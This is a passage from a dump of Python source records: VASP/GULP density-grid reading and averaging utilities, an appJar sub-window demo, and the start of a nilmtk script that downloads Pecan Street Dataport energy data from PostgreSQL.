elements with a field magnitude greater than cutoff\n Args:\n gradients: the grid of field gradients (Real(ngx,ngy,ngz))\n cutoff: the value above which tocout them (Real)\n Returns:\n number_of_elements: the number satisfying the condition (Integer)\n \"\"\"\n number_of_elements = 0\n for element in np.nditer(gradients):\n if element >= cutoff:\n number_of_elements += 1\n\n return number_of_elements\n#------------------------------------------------------------------------------\n\ndef element_vol(vol, nx, ny, nz):\n \"\"\"Calculates the volume of each of the elements on the grid.\n Args:\n vol: the cell volume (real)\n x : the number of grid points in each direction (real)\n Returns:\n ele_vol : the volume (real)\n \"\"\"\n number_of_elements = nx * ny * nz\n ele_vol = vol / number_of_elements\n\n return ele_vol\n\n#------------------------------------------------------------------------------\n\ndef one_2_2d(Array, resolution, vector):\n \"\"\"Converts the 1d potential array to 2D with angstroms in A[0]\n Args:\n Array: 1D array\n resolution: density of sampling of distance (1/AA)\n vector: The vector of the direction of sampling\n Returns\n New_array: 2D array\n \"\"\"\n length = np.sqrt(vector.dot(vector))\n New_array = np.zeros(shape=(len(Array) - 1, 2))\n resolution = length / len(Array)\n for i in range(len(Array) - 1):\n New_array[i,0] = i*resolution\n New_array[i,1] = Array[i]\n\n return New_array\n#------------------------------------------------------------------------------\n\ndef macroscopic_average(potential, periodicity, resolution):\n \"\"\"Getting the macroscopic average of potential\n Args:\n potential : array containig the electrostaticpotential/charge density\n periodicity : real number; the period over which to average\n resolution : the grid resolution in the direction of averaging\n Returns:\n macro_average : array with the macroscopically averaged values\"\"\"\n\n\n macro_average = np.zeros(shape=(len(potential)))\n period_points = int((periodicity/resolution))\n # Period points must be even\n if period_points % 2 != 0:\n period_points = period_points + 1\n\n length = len(potential)\n for i in range(length):\n start = i - int(period_points / 2)\n end = i + int(period_points / 2)\n if start < 0:\n start = start + length\n macro_average[i] = macro_average[i] + sum(potential[0:end]) + sum(potential[start:length])\n macro_average[i] = macro_average[i] / period_points\n elif end >= length:\n end = end - length\n macro_average[i] = macro_average[i] + sum(potential[start:length]) + sum(potential[0:end])\n macro_average[i] = macro_average[i] / period_points\n else:\n macro_average[i] = macro_average[i] + sum(potential[start:end]) / period_points\n\n print(\"Average of the average = \", numpy.average(macro_average))\n\n return macro_average\n#------------------------------------------------------------------------------\n\ndef cube_potential(origin, travelled, cube, Grid, nx, ny, nz):\n \"\"\"Populates the sampling cube with the potential required\"\"\"\n\n # Recalc the origin as grid point coordinates\n n_origin = np.zeros(shape=(3))\n n_origin[0] = int(origin[0]*nx)\n n_origin[1] = int(origin[1]*ny)\n n_origin[2] = int(origin[2]*nz)\n potential_cube = np.zeros(shape=(cube[0],cube[1],cube[2]))\n for x in range(0,cube[0]):\n for y in range(0,cube[1]):\n for z in range(0,cube[2]):\n # Assign the values of coordinates in the original grid\n xv = int(n_origin[0]+travelled[0]+x)\n yv = int(n_origin[1]+travelled[1]+y)\n zv = int(n_origin[2]+travelled[2]+z)\n # Minimum image convention\n zv = int(zv - nz*round(zv/nz))\n yv = int(yv - ny*round(yv/ny))\n xv = int(xv - nx*round(xv/nx))\n potential_cube[x,y,z] = Grid[int(xv),int(yv),int(zv)]\n\n return potential_cube.mean(), np.var(potential_cube)\n#------------------------------------------------------------------------------\n\ndef cuboid_average(Grid, cube, origin, vector, nx, ny, nz, magnitude):\n \"\"\"Calculates the average in a cube defined by size cube(a,b,c), beginning\n at origin and travelling as far as magnitude.\"\"\"\n\n plotting_average = np.zeros(shape=(magnitude))\n i = 0\n while i < magnitude:\n travelled = np.multiply(i, vector)\n plotting_average[i], varience = cube_potential(origin, travelled,\n cube, Grid,\n nx, ny, nz)\n i = i + 1\n\n return plotting_average\n#------------------------------------------------------------------------------\n\ndef planar_average(Grid, nx, ny, nz, axis='z'):\n \"\"\"Calculate the average in a given plane for the full length of the\n normal; e.g. the full length of z in the xy plane.\"\"\"\n if axis == 'x':\n x_plane = np.zeros(shape=(ny, nz))\n Average = np.zeros(shape=(nx))\n for x_value in range(nx):\n x_plane[:,:] = Grid[x_value,:,:]\n Average[x_value] = x_plane.mean()\n if axis == 'y':\n Average = np.zeros(shape=(ny))\n y_plane = np.zeros(shape=(nx,nz))\n for y_value in range(ny):\n y_plane[:,:] = Grid[:,y_value,:]\n Average[y_value] = y_plane.mean()\n if axis == 'z':\n Average = np.zeros(shape=(nz))\n z_plane = np.zeros(shape=(nx,ny))\n for z_value in range(nz):\n z_plane[:,:] = Grid[:,:,z_value]\n Average[z_value] = z_plane.mean()\n\n return Average\n#------------------------------------------------------------------------------\n\ndef get_volume(a,b,c):\n \"\"\"Calculate the volume of the cell from lattice vectors\n Args:\n a/b/c: vectors of the lattice edges\n \"\"\"\n volume = np.dot(a,np.cross(b,c))\n\n return volume\n#------------------------------------------------------------------------------\n\ndef numbers_2_grid(a,NGX,NGY,NGZ):\n \"\"\"Takes a point (in fractional coordinates) and converts it to a VASP grid\n point based on the NGX/Y/Z values.\"\"\"\n a_grid = np.zeros(shape=(3))\n a_grid[0] = round(float(a[0])*NGX)\n a_grid[1] = round(float(a[1])*NGY)\n a_grid[2] = round(float(a[2])*NGZ)\n\n return a_grid\n#------------------------------------------------------------------------------\n\ndef matrix_2_abc(Lattice):\n \"\"\"The the VASP lattice and convert to the a,b,c,alpha,beta,gamma format\"\"\"\n\n a = np.sqrt(Lattice[0,0]**2+Lattice[0,1]**2+Lattice[0,2]**2)\n b = np.sqrt(Lattice[1,0]**2+Lattice[1,1]**2+Lattice[1,2]**2)\n c = np.sqrt(Lattice[2,0]**2+Lattice[2,1]**2+Lattice[2,2]**2)\n\n a_vec = Lattice[0,:]\n b_vec = Lattice[1,:]\n c_vec = Lattice[2,:]\n\n return a,b,c,a_vec,b_vec,c_vec\n#------------------------------------------------------------------------------\n\ndef _print_boom(quiet=False):\n if not quiet:\n print(\"\\n\")\n print(\"BBBB OOOO OOOO MMMMM \")\n print(\"BBBB OOOO OOOO MMMMM \")\n print(\"BBBB OOOO OOOO MMMMM \")\n print(\"B B OOOO OOOO MMMMM \")\n print(\"B B O O O O MMMMM \")\n print(\"B B O O O O MMMMM \")\n print(\"B B O O O O MMMMM \")\n print(\"B B O O O O MMMMM \")\n print(\"BBBB O O O O M M M \")\n print(\"BBBB O O O O M M M \")\n print(\"BBBB O O O O M M M \")\n print(\"B B O O O O M M M \")\n print(\"B B O O O O M M M \")\n print(\"B B O O O O M M M \")\n print(\"B B O O O O M M M \")\n print(\"B B OOOO OOOO M M M \")\n print(\"BBBB OOOO OOOO M M M \")\n print(\"BBBB OOOO OOOO M M M \")\n print(\"BBBB OOOO OOOO M M M \")\n\ndef read_vasp_density(FILE, use_pandas=None, quiet=False):\n \"\"\"Generic reading of CHGCAR LOCPOT etc files from VASP\n\n Args:\n FILE (str): Path to density file\n use_pandas (bool): Use Pandas library for faster file reading. If set\n to None, Pandas will be used when available.\n\n Returns:\n Potential (array), NGX (int), NGY (int), NGZ (int), lattice (array)\n\n where Potential is a 1-D flattened array of density data with original\n dimensions NGX x NGY x NGZ and lattice is the 3x3 unit-cell matrix.\n\n \"\"\"\n # Get Header information by reading a line at a time\n\n if use_pandas:\n from pandas import read_table as pandas_read_table\n elif use_pandas is None:\n try:\n from pandas import read_table as pandas_read_table\n use_pandas = True\n except ImportError:\n use_pandas = False\n\n print(\"Reading header information...\")\n with open(FILE, \"r\") as f:\n _ = f.readline()\n scale_factor = float(f.readline())\n\n lattice = np.zeros(shape=(3,3))\n for row in range(3):\n lattice[row] = [float(x) for x in f.readline().split()]\n lattice = lattice * scale_factor\n\n num_species = len(f.readline().split())\n num_type = [int(x) for x in f.readline().split()]\n num_atoms = sum(num_type)\n coord_type = f.readline().strip()\n\n coordinates = numpy.zeros(shape=(num_atoms, 3))\n for atom_i in range(num_atoms):\n coordinates[atom_i] = [float(x) for x in f.readline().split()]\n\n # Skip blank line\n _ = f.readline()\n\n NGX, NGY, NGZ = [int(x) for x in f.readline().split()]\n\n if use_pandas:\n print(\"Reading 3D data using Pandas...\")\n skiprows = 10 + num_atoms\n readrows = int(math.ceil(NGX * NGY * NGZ / 5))\n\n dat = pandas_read_table(FILE, delim_whitespace=True,\n skiprows=skiprows, header=None,\n nrows=readrows)\n Potential = dat.iloc[:readrows, :5].values.flatten()\n remainder = (NGX * NGY * NGZ) % 5\n if remainder > 0:\n Potential = Potential[:(-5 + remainder)]\n\n else:\n print(\"Reading 3D data...\")\n Potential = (f.readline().split()\n for i in range(int(math.ceil(NGX * NGY * NGZ / 5))))\n Potential = numpy.fromiter(chain.from_iterable(Potential), float)\n\n _print_boom(quiet=quiet)\n if not quiet:\n print(\"Average of the potential = \", numpy.average(Potential))\n\n return Potential, NGX, NGY, NGZ, lattice\n#------------------------------------------------------------------------------\n\ndef _read_partial_density(FILE, use_pandas, num_atoms, NGX, NGY, NGZ, spin=0):\n '''\n use_pandas (bool): Use Pandas library for faster file reading. If set \n to None, Pandas will be used when available.\n spin: the set of spin data to read, default 0 for ISPIN=1 calculation\n '''\n print(\"PANDAS:\", use_pandas)\n if use_pandas:\n from pandas import read_table as pandas_read_table\n elif use_pandas is None:\n try:\n from pandas import read_table as pandas_read_table\n use_pandas = True\n except ImportError:\n use_pandas = False\n\n\n with open(FILE, \"r\") as f:\n _ = f.readline()\n scale_factor = float(f.readline())\n\n lattice = np.zeros(shape=(3,3))\n for row in range(3):\n lattice[row] = [float(x) for x in f.readline().split()]\n lattice = lattice * scale_factor\n\n num_species = len(f.readline().split())\n num_type = [int(x) for x in f.readline().split()]\n num_atoms = sum(num_type)\n coord_type = f.readline().strip()\n\n coordinates = numpy.zeros(shape=(num_atoms, 3))\n for atom_i in range(num_atoms):\n coordinates[atom_i] = [float(x) for x in f.readline().split()]\n\n # Skip blank line\n _ = f.readline()\n\n NGX, NGY, NGZ = [int(x) for x in f.readline().split()]\n\n if use_pandas:\n print(\"Reading 3D data using Pandas...\")\n skiprows = 10 + num_atoms + spin * \\\n (math.ceil(NGX * NGY * NGZ / 10) + 2)\n readrows = int(math.ceil(NGX * NGY * NGZ / 10))\n\n dat = pandas_read_table(FILE, delim_whitespace=True,\n skiprows=skiprows, header=None,\n nrows=readrows)\n density = dat.iloc[:readrows, :10].values.flatten()\n remainder = (NGX * NGY * NGZ) % 10\n if remainder > 0:\n density = density[:(-10 + remainder)]\n else:\n print(\"Reading 3D data...\")\n density = (f.readline().split()\n for i in range(int(math.ceil(NGX * NGY * NGZ / 10))))\n density = numpy.fromiter(chain.from_iterable(density), float)\n\n return density\n\n#------------------------------------------------------------------------------\ndef read_vasp_parchg(FILE, use_pandas=None, quiet=False, spin=False):\n \"\"\"Generic reading of CHGCAR LOCPOT etc files from VASP\n\n Args:\n FILE (str): Path to parchg file\n use_pandas (bool): Use Pandas library for faster file reading. If set\n to None, Pandas will be used when available.\n spin(bool): is the data spin polarised? \n\n Returns:\n density (array), NGX (int), NGY (int), NGZ (int), lattice (array)\n\n where density is a 1-D flattened array of density data with original\n dimensions NGX x NGY x NGZ and lattice is the 3x3 unit-cell matrix.\n\n \"\"\"\n # Get Header information by reading a line at a time\n\n print(\"Reading header information...\")\n with open(FILE, \"r\") as f:\n _ = f.readline()\n scale_factor = float(f.readline())\n\n lattice = np.zeros(shape=(3,3))\n for row in range(3):\n lattice[row] = [float(x) for x in f.readline().split()]\n lattice = lattice * scale_factor\n\n num_species = len(f.readline().split())\n num_type = [int(x) for x in f.readline().split()]\n num_atoms = sum(num_type)\n coord_type = f.readline().strip()\n\n coordinates = numpy.zeros(shape=(num_atoms, 3))\n for atom_i in range(num_atoms):\n coordinates[atom_i] = [float(x) for x in f.readline().split()]\n\n # Skip blank line\n _ = f.readline()\n\n NGX, NGY, NGZ = [int(x) for x in f.readline().split()]\n \n if not spin:\n density = _read_partial_density(FILE, use_pandas, num_atoms, NGX, NGY, NGZ)\n else:\n densities = []\n densities.append(_read_partial_density(FILE, use_pandas, num_atoms, NGX, NGY, NGZ\n , spin=0))\n densities.append(_read_partial_density(FILE, use_pandas, num_atoms, NGX, NGY, NGZ\n , spin=1))\n alpha = densities[0] + densities[1]\n beta = densities[0] - densities[1]\n density = [alpha, beta]\n _print_boom(quiet=quiet)\n\n return density, NGX, NGY, NGZ, lattice\n\ndef read_vasp_density_classic(FILE):\n \"\"\"Reimplementation of the legacy 3D data importer\n\n This is still quite a bit slower than the new ``read_vasp_density`` but it\n makes less assumptions about where newlines will appear in the file. It\n also prints the progress reading through the file; this definitely makes it\n slower but might _feel_ faster!\n \"\"\"\n with open(FILE, \"r\") as f:\n lines = f.readlines()\n return _read_vasp_density_fromlines(lines)\n\ndef _read_vasp_density_fromlines(lines):\n \"\"\"Generic reading of CHGCAR LOCPOT etc files from VASP\"\"\"\n\n i, j, k = 0, 0, 0\n NGX, NGY, NGZ = 0, 0, 0\n\n lattice = np.zeros(shape=(3,3))\n upper_limit, num_species, scale_factor = 0, 0, 0\n num_atoms = 1 # First test needs to fail until headers have been read\n Potential, Coordinates = np.zeros(1), np.zeros(1)\n\n for line in lines:\n inp = line.split()\n\n if inp == []:\n continue\n else:\n i += 1\n if i > (num_atoms + 9) and i < (num_atoms + 10 + upper_limit):\n for m, val in enumerate(inp):\n Potential[k + m] = val\n k = k + 5\n if math.fmod(k, 100000) == 0:\n print(\"Reading potential at point\", k)\n elif i == 2:\n scale_factor = float(inp[0])\n elif i >= 3 and i < 6:\n lattice[i-3,:]=inp[:]\n elif i == 6:\n num_species = len(inp)\n species = inp\n elif i == 7:\n num_type = inp\n num_atoms = sum(int(x) for x in num_type)\n elif i == 8:\n coord_type = inp\n Coordinates = numpy.zeros(shape=(num_atoms,3))\n elif i >= 9 and i <= num_atoms + 8:\n Coordinates[i-9,0] = float(inp[0])\n Coordinates[i-9,1] = float(inp[1])\n Coordinates[i-9,2] = float(inp[2])\n elif i == num_atoms + 9:\n NGX = int(inp[0])\n NGY = int(inp[1])\n NGZ = int(inp[2])\n Potential = numpy.zeros(shape=(NGX * NGY * NGZ))\n # Read in the potential data\n upper_limit = (int(NGX * NGY * NGZ / 5) +\n np.mod(NGX * NGY * NGZ, 5))\n\n _print_boom()\n print(\"Average of the potential = \", numpy.average(Potential))\n\n lattice = lattice * scale_factor\n\n return Potential, NGX, NGY, NGZ, lattice\n#------------------------------------------------------------------------------\n\ndef density_2_grid(Density, nx, ny, nz, Charge=False, Volume=1):\n \"\"\"Convert the Potential list to a grid for ease of manipulation\n Args:\n Density: Array of the output from a VAsp calulation charge/potential\n nx,y,z : Number of mesh points in x/y/z\n Charge : Boolean, is it charge or potential (charge needs to be\n normalised by vol)\n Volume : The lattice vectors, only required for normalising charge.\n Returns:\n Potential_grid: the (normalised) quantity on a mesh\n total_electrons : the number of electrons in the system\n \"\"\"\n l = 0\n Potential_grid = np.zeros(shape=(nx,ny,nz))\n total_electrons = 0\n is_CHGCAR = True\n for k in range(nz):\n for j in range(ny):\n for i in range(nx):\n Potential_grid[i,j,k] = Density[l] / Volume\n if Charge == True:\n # Convert the charge density to a number of electrons\n point_volume = Volume / (nx*ny*nz)\n Potential_grid[i,j,k] = Potential_grid[i,j,k]*point_volume\n total_electrons = total_electrons + Density[l]\n l = l + 1\n if Charge == True:\n print(\"Total electrons: \", total_electrons / (nx * ny * nz))\n total_electrons = total_electrons / (nx * ny * nz)\n return Potential_grid, total_electrons\n#------------------------------------------------------------------------------\n\ndef density_2_grid_gulp(Density, nx, ny, nz):\n \"\"\"Convert the Potential list to a grid for ease of manipulation\n Args:\n Density: Array of the output from a VAsp calulation charge/potential\n nx,y,z : Number of mesh points in x/y/z\n Returns:\n Potential_grid: the (normalised) quantity on a mesh\n \"\"\"\n l = 0\n Potential_grid = np.zeros(shape=(nx,ny,nz))\n total_electrons = 0\n is_CHGCAR = True\n for k in range(nx):\n for j in range(ny):\n for i in range(nz):\n Potential_grid[k,j,i] = Density[l]\n l = l + 1\n return Potential_grid\n\n#------------------------------------------------------------------------------\ndef read_gulp_potential(gulpfile='gulp.out'):\n\n \"\"\"Generic reading of GULP output\n\n Args:\n gulpfile (str): Path to gulp output file\n\n Returns:\n potential (array), NGX (int), NGY (int), NGZ (int), lattice (array)\n\n where density is a 1-D flattened array of density data with original\n dimensions NGX x NGY x NGZ and lattice is the 3x3 unit-cell matrix.\n \"\"\"\n\n potential = []\n\n try:\n file_handle=open(gulpfile)\n except IOError:\n print(\"File not found or path is incorrect\")\n \n lines = file_handle.readlines()\n for n, line in enumerate(lines):\n if line.rfind('Cartesian lattice vectors') > -1:\n lattice = np.zeros(shape=(3, 3))\n for r in range(3):\n lattice[r] = lines[n + 2 + r].split()\n break\n\n for n, line in enumerate(lines):\n if line.rfind('Electrostatic potential on a grid') > -1:\n NGX = int(lines[n + 3].split()[3])\n NGY = int(lines[n + 3].split()[5])\n NGZ = int(lines[n + 3].split()[7])\n break\n\n for n, line in enumerate(lines):\n if line.rfind('Electrostatic potential on a grid') > -1:\n for k in reversed(range(9, NGX*NGY*NGZ + 9)):\n potential.append(float(lines[n + k].split()[3]))\n\n\n return np.asarray(potential), NGX, NGY, NGZ, lattice\n\n\n#------------------------------------------------------------------------------\n\ndef GCD(a,b):\n \"\"\" The Euclidean Algorithm \"\"\"\n a = abs(a)\n b = abs(b)\n while a:\n a, b = (b % a), a\n return b\n#------------------------------------------------------------------------------\n\ndef GCD_List(list):\n \"\"\" Finds the GCD of numbers in a list.\n Input: List of numbers you want to find the GCD of\n E.g. [8, 24, 12]\n Returns: GCD of all numbers\n \"\"\"\n return reduce(GCD, list)\n#------------------------------------------------------------------------------\ndef inverse_participation_ratio(density):\n \"\"\" Calculate the IPR, which is Psi**4 or Rho**2\n Input: density, a 1-D flattened grid of the electron density for the state\n this is calculated from the PARCHG in VASP\n Output: ipr, float\n \"\"\"\n\n sq = sum(i**2 for i in density)\n fr = sum(i**4 for i in density)\n ifr = 1 / (len(density) * fr)\n isq = 1 / (len(density) * sq)\n return fr / sq**2\n\n"} {"ext": "py", "sha": "1a30c42733997c4dd61bb8f8ece8382751675f09", "content": "import sys\nsys.path.append(\"../../\")\n\ndef press(btn):\n if btn == \"SUB\":\n app.showSubWindow(\"Sub\")\n app.hide()\n if btn in [\"POPUP2\", \"POPUP\"]:\n app.infoBox(\"INFO\", \"INFO\")\n if btn == \"MAIN\":\n app.show()\n app.hideSubWindow(\"Sub\")\n\ndef closer(btn=None):\n print(\"aaa\")\n\nfrom appJar import gui\n\nwith gui(\"Main Window\", startWindow=\"Sub\") as app:\n#with gui(\"Main Window\") as app:\n app.label(\"title\", \"Main Window\")\n app.button(\"POPUP\", press)\n\n with app.subWindow(\"Sub\"):\n app.label(\"sub\", \"SubWindow\")\n app.button(\"POPUP2\", press)\n app.button(\"MAIN\", press)\n app.setStopFunction(closer)\n\n# app.hide()\n# app.showSubWindow(\"Sub\")\n"} {"ext": "py", "sha": "1a30c46c94fb35b6bee3ab3b31e060ffca5f66d9", "content": "from __future__ import print_function, division\nimport os\nimport re\nimport datetime\nimport sys\nfrom os.path import join, isdir, isfile, dirname, abspath\nimport pandas as pd\nimport yaml\nimport psycopg2 as db\nfrom nilmtk.measurement import measurement_columns\nfrom nilmtk.measurement import LEVEL_NAMES\nfrom nilmtk.datastore import Key\nfrom nilm_metadata import convert_yaml_to_hdf5\nfrom nilmtk.utils import get_module_directory\nimport shutil\nimport tempfile\n\n\"\"\"\nMANUAL:\n\ndataport is a large dataset hosted in a remote SQL database. This\nfile provides a function to download the dataset and save it to disk\nas NILMTK-DF. Since downloading the entire dataset will likely take >\n24 hours, this function provides some options to allow you to download\nonly a subset of the data.\n\n'''''''''''''''' Previous Version '''''''''''''''''''''\nFor example, to only load house 26 for April 2014:\n from nilmtk.dataset_converters.dataport.download_dataport\n import download_dataport\n download_dataport(\n 'username',\n 'password',\n '/path/output_filename.h5',\n periods_to_load={26: ('2014-04-01', '2014-05-01')}\n )\n'''''''''''''''' Previous Version '''''''''''''''''''''\n\n'''''''''''''''' New Version '''''''''''''''''''''\n\n from nilmtk.dataset_converters.dataport.download_dataport\n import download_dataport,\n _dataport_dataframe_to_hdf,\n view_database_tables,\n view_buildings,\n view_data_window\n\n # see all available tables in the dataport database.\n view_database_tables(\n 'username',\n 'password',\n 'database_schema' # university or commercial\n )\n\n # show the list of all available buildings\n view_buildings(\n 'username',\n 'password',\n 'database_schema', # university or commercial\n 'table_name' # for example 'electricity_egauge_15min', 'electricity_egauge_hours'\n )\n\n # view data collection window of selected buildings\n view_data_window(\n 'username',\n 'password',\n 'database_schema', # university or commercial\n 'table_name', # for example 'electricity_egauge_15min','electricity_egauge_hours'\n [18,26,43,44] # data collection window of building 18,26,43 and 44 respectively\n )\n\n # download the dataset.\n For example, loading electricity_egauge_hours from 2018-11-17 to\n 2019-12-17 of building 26\n download_dataport(\n 'username',\n 'password',\n '/path/output_filename.h5',\n 'university',\n 'electricity_egauge_hours',\n periods_to_load={ 26: ('2018-11-17', '2019-12-17')})\n\n\n'''''''''''''''' New Version '''''''''''''''''''''\n\nREQUIREMENTS:\n\nOn Ubuntu:\n* sudo apt-get install libpq-dev\n* sudo pip install psycopg2\n\nTODO:\n* intelligently handle queries that fail due to network\n* integrate 'grid' (use - gen) and 'gen'\n\n\"\"\"\nfeed_mapping = {\n 'use': {},\n 'air1': {'type': 'air conditioner'},\n 'air2': {'type': 'air conditioner'},\n 'air3': {'type': 'air conditioner'},\n 'airwindowunit1': {'type': 'air conditioner'},\n 'aquarium1': {'type': 'appliance'},\n 'bathroom1': {'type': 'sockets', 'room': 'bathroom'},\n 'bathroom2': {'type': 'sockets', 'room': 'bathroom'},\n 'bedroom1': {'type': 'sockets', 'room': 'bedroom'},\n 'bedroom2': {'type': 'sockets', 'room': 'bedroom'},\n 'bedroom3': {'type': 'sockets', 'room': 'bedroom'},\n 'bedroom4': {'type': 'sockets', 'room': 'bedroom'},\n 'bedroom5': {'type': 'sockets', 'room': 'bedroom'},\n 'car1': {'type': 'electric vehicle'},\n 'clotheswasher1': {'type': 'washing machine'},\n 'clotheswasher_dryg1': {'type': 'washer dryer'},\n 'diningroom1': {'type': 'sockets', 'room': 'dining room'},\n 'diningroom2': {'type': 'sockets', 'room': 'dining room'},\n 'dishwasher1': {'type': 'dish washer'},\n 'disposal1': {'type': 'waste disposal unit'},\n 'drye1': {'type': 'spin dryer'},\n 'dryg1': {'type': 'spin dryer'},\n 'freezer1': {'type': 'freezer'},\n 'furnace1': {'type': 'electric furnace'},\n 'furnace2': {'type': 'electric furnace'},\n 'garage1': {'type': 'sockets', 'room': 'dining room'},\n 'garage2': {'type': 'sockets', 'room': 'dining room'},\n 'gen': {},\n 'grid': {},\n 'heater1': {'type': 'electric space heater'},\n 'housefan1': {'type': 'electric space heater'},\n 'icemaker1': {'type': 'appliance'},\n 'jacuzzi1': {'type': 'electric hot tub heater'},\n 'kitchen1': {'type': 'sockets', 'room': 'kitchen'},\n 'kitchen2': {'type': 'sockets', 'room': 'kitchen'},\n 'kitchenapp1': {'type': 'sockets', 'room': 'kitchen'},\n 'kitchenapp2': {'type': 'sockets', 'room': 'kitchen'},\n 'lights_plugs1': {'type': 'light'},\n 'lights_plugs2': {'type': 'light'},\n 'lights_plugs3': {'type': 'light'},\n 'lights_plugs4': {'type': 'light'},\n 'lights_plugs5': {'type': 'light'},\n 'lights_plugs6': {'type': 'light'},\n 'livingroom1': {'type': 'sockets', 'room': 'living room'},\n 'livingroom2': {'type': 'sockets', 'room': 'living room'},\n 'microwave1': {'type': 'microwave'},\n 'office1': {'type': 'sockets', 'room': 'office'},\n 'outsidelights_plugs1': {'type': 'sockets', 'room': 'outside'},\n 'outsidelights_plugs2': {'type': 'sockets', 'room': 'outside'},\n 'oven1': {'type': 'oven'},\n 'oven2': {'type': 'oven'},\n 'pool1': {'type': 'electric swimming pool heater'},\n 'pool2': {'type': 'electric swimming pool heater'},\n 'poollight1': {'type': 'light'},\n 'poolpump1': {'type': 'electric swimming pool heater'},\n 'pump1': {'type': 'appliance'},\n 'range1': {'type': 'stove'},\n 'refrigerator1': {'type': 'fridge'},\n 'refrigerator2': {'type': 'fridge'},\n 'security1': {'type': 'security alarm'},\n 'shed1': {'type': 'sockets', 'room': 'shed'},\n 'sprinkler1': {'type': 'appliance'},\n 'unknown1': {'type': 'unknown'},\n 'unknown2': {'type': 'unknown'},\n 'unknown3': {'type': 'unknown'},\n 'unknown4': {'type': 'unknown'},\n 'utilityroom1': {'type': 'sockets', 'room': 'utility room'},\n 'venthood1': {'type': 'appliance'},\n 'waterheater1': {'type': 'electric water heating appliance'},\n 'waterheater2': {'type': 'electric water heating appliance'},\n 'winecooler1': {'type': 'appliance'},\n }\n\nfeed_ignore = ['gen', 'grid']\n\n\ndef database_assert(database_table):\n assert (\n database_table == 'electricity_egauge_15min' or\n database_table == 'electricity_egauge_hours' or\n database_table == 'electricity_egauge_minutes' or\n database_table == 'electricity_egauge_seconds'\n ), \"Table not compatible with NILMTK\"\n\n\ndef view_database_tables(\n database_username,\n database_password,\n database_schema\n):\n database_host = 'dataport.pecanstreet.org'\n database_port = '5434'\n database_name = 'postgres'\n\n try:\n conn = db.connect('host=' + database_host +\n ' port=' + database_port +\n ' dbname=' + database_name +\n ' user=' + database_username +\n ' password=' + database_password)\n except:\n print('Could not connect to remote database')\n raise\n\n # Loading university schemas\n sql_query = (\"SELECT table_name\" +\n \" FROM information_schema.views\" +\n \" WHERE table_schema ='\" + database_schema + \"'\" +\n \" ORDER BY table_name\")\n database_tables = pd.read_sql(sql_query, conn)['table_name'].tolist()\n\n df = pd.DataFrame({database_schema: database_tables})\n print(df)\n conn.close()\n\n\ndef view_buildings(\n database_username,\n database_password,\n database_schema,\n database_table\n):\n\n database_assert(database_table)\n database_host = 'dataport.pecanstreet.org'\n database_port = '5434'\n database_name = 'postgres'\n\n # try to connect to database\n try:\n conn = db.connect('host=' + database_host +\n ' port=' + database_port +\n ' dbname=' + database_name +\n ' user=' + database_username +\n ' password=' + database_password)\n except:\n print('Could not connect to remote database')\n raise\n\n # select all buildings for the database_table\n sql_query = ('SELECT DISTINCT dataid' +\n ' FROM university.metadata' +\n ' WHERE' + database_table +\n ' ORDER BY dataid')\n\n buildings_in_table = pd.read_sql(sql_query, conn)['dataid'].tolist()\n print(buildings_in_table)\n conn.close()\n\n\ndef view_data_window(\n database_username,\n database_password,\n database_schema,\n database_table,\n building_no=None):\n\n database_assert(database_table)\n database_host = 'dataport.pecanstreet.org'\n database_port = '5434'\n database_name = 'postgres'\n\n # try to connect to database\n try:\n conn = db.connect('host=' + database_host +\n ' port=' + database_port +\n ' dbname=' + database_name +\n ' user=' + database_username +\n ' password=' + database_password)\n except:\n print('Could not connect to remote database')\n raise\n\n # select all buildings for the database_table\n sql_query = ('SELECT DISTINCT dataid' +\n ' FROM university.metadata' +\n ' WHERE' + database_table +\n ' ORDER BY dataid')\n\n if(not (building_no)):\n print(\" Please provide the list of building numbers \")\n else:\n for each_building in building_no:\n sql_query = ('SELECT MIN(egauge_min_time) AS minlocalminute,' +\n ' MAX(egauge_max_time) AS maxlocalminute' +\n ' FROM university.metadata' +\n ' WHERE dataid=' + str(each_building))\n\n timestamps = pd.read_sql(sql_query, conn)\n first_timestamp_in_table = timestamps['minlocalminute'][0]\n last_timestamp_in_table = timestamps['maxlocalminute'][0]\n print(str(each_building),\n \"\\t\\t\", first_timestamp_in_table,\n \"\\t\\t\", last_timestamp_in_table)\n print(\"Done loading all the buildings!!\")\n\n conn.close()\n\n\ndef download_dataport(database_username,\n database_password, hdf_filename,\n database_schema='university',\n user_selected_table='electricity_egauge_minutes',\n periods_to_load=None):\n \"\"\"\n Downloads data from dataport database into an HDF5 file.\n\n Parameters\n ----------\n hdf_filename : str\n Output HDF filename. If file exists already then will be deleted.\n database_username, database_password, database_schema,user_selected_table, hdf_filename : str\n periods_to_load : dict of tuples, optional\n Key of dict is the building number (int).\n Values are (<start date>, <end date>)\n e.g. (\"2013-04-01\", None) or (\"2013-04-01\", \"2013-08-01\")\n defaults to all buildings and all date ranges\n \"\"\"\n\n database_assert(user_selected_table)\n # dataport database settings\n database_host = 'dataport.pecanstreet.org'\n database_port = '5434'\n database_name = 'postgres'\n\n # try to connect to database\n try:\n conn = db.connect('host=' + database_host +\n ' port=' + database_port +\n ' dbname=' + database_name +\n ' user=' + database_username +\n ' password=' + database_password)\n except:\n print('Could not connect to remote database')\n raise\n\n # map user_selected_table and timestamp column\n timestamp_map = {\"electricity_egauge_15min\": \"local_15min\",\n \"electricity_egauge_hours\": \"localhour\",\n \"electricity_egauge_minutes\": \"localminute\",\n \"electricity_egauge_seconds\": \"localminute\"}\n\n # set up a new HDF5 datastore (overwrites existing store)\n store = pd.HDFStore(hdf_filename, 'w', complevel=9, complib='zlib')\n\n # Create a temporary metadata dir, remove existing building\n # yaml files in module dir (if any)\n original_metadata_dir = join(get_module_directory(),\n 'dataset_converters',\n 'dataport',\n 'metadata')\n tmp_dir = tempfile.mkdtemp()\n metadata_dir = join(tmp_dir, 'metadata')\n shutil.copytree(original_metadata_dir, metadata_dir)\n print(\"Using temporary dir for metadata:\", metadata_dir)\n\n for f in os.listdir(metadata_dir):\n if re.search('^building', f):\n os.remove(join(metadata_dir, f))\n\n \"\"\"\n TODO:\n The section below can be altered or removed,\n since the restructured Dataport\n now has only one electricity_egauge_minutes table.\n \"\"\"\n # get tables in database schema\n sql_query = (\"SELECT table_name\" +\n \" FROM information_schema.views\" +\n \" WHERE table_schema ='\" + database_schema + \"'\" +\n \" ORDER BY table_name\")\n database_tables = pd.read_sql(sql_query, conn)['table_name'].tolist()\n database_tables = [t for t in database_tables if user_selected_table in t]\n # if user has specified buildings\n if periods_to_load:\n buildings_to_load = list(periods_to_load.keys())\n else:\n # get buildings present in all tables\n sql_query = ''\n for table in database_tables:\n 